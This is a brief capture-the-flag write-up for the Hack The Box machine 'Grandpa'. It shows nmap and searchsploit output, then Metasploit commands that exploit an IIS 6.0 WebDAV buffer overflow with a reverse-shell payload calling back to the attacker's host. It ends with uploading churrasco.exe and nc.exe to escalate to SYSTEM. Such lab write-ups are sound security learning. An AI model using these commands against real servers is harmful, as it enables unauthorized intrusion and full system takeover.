Grandpa — HTB

MACHINE IP — 10.10.10.14

Nmap

# nmap -v -A -sC -oN nmap 10.10.10.14
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info: 
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Server Date: Thu, 12 Dec 2019 11:06:13 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Then I used searchsploit for iis 6.0 and found a Remote Buffer overflow vulnerability in Microsoft IIS httpd 6.0, you can check this exploit in google also.

# searchsploit iis 6.0
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

Then I run the msfconsole command in the terminal

1| use exploit/windows/iis/iis_webdav_scstoragepathfromurl
2| set rhost 10.10.10.14
3| set lhost 10.10.14.4
4| set payload windows/meterpreter/reverse_tcp
5| run
6| meterpreter > shell

we got the reverse shell, it looks like we got the “nt authority/network service”

we do privilege escalation to system authority and we got the way to privilege escalation from token-kidnapping

Let’s upload a file from our local system to our target system

upload /usr/share/sqlninja/apps/churrasco.exe
upload /usr/share/sqlninja/apps/nc.exe

let’s move to cmd shell

and we got at system shell

we can access system without any restrictions

THANKYOU ……….